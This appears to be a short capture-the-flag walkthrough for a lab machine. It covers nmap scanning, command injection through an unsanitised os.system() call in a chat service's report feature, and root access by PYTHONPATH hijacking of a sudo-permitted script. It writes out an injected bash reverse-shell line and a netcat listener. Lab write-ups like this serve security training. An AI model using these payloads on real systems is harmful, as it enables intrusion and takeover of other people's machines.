Deploy the machine, make sure you are connected to VPN.
Start with scanning the IP using Nmap:
nmap -sV -Pn <machine IP>
Let’s get the source code from the admin’s Github as we can see in the above image:
These are the links we found and let's jump into it to get the code:
In the code, we can see the “os.system()” is used to echo the input from “[REPORT]” to a text file. We can see that it is using “%s” and there is NO sanitization of user input, we can exploit this:
Let’s first connect to the chat
nc <machine IP> 3000
Use the [REPORT] and click enter, it will ask for a name. Enter a name then semicolon(;) and then our revershell :
bash -i >& /dev/tcp/<machine ip>/port 0>&1;
Meanwhile, open the Netcat listener: nc -lvnp port to our machine
Go to the /home/wes directory and we found our first flag i.e. user.txt
Let’s check we can run sudo -l
Now, cat the test_module.py file
Here, it is importing compare module and then running a print command. As we can’t make changes to the test_module.py file so we will create a compare.py file with the following contents.
Now export the PYTHONPATH, then run the command from sudo -l.
And here we got the last flag i.e. root.txt.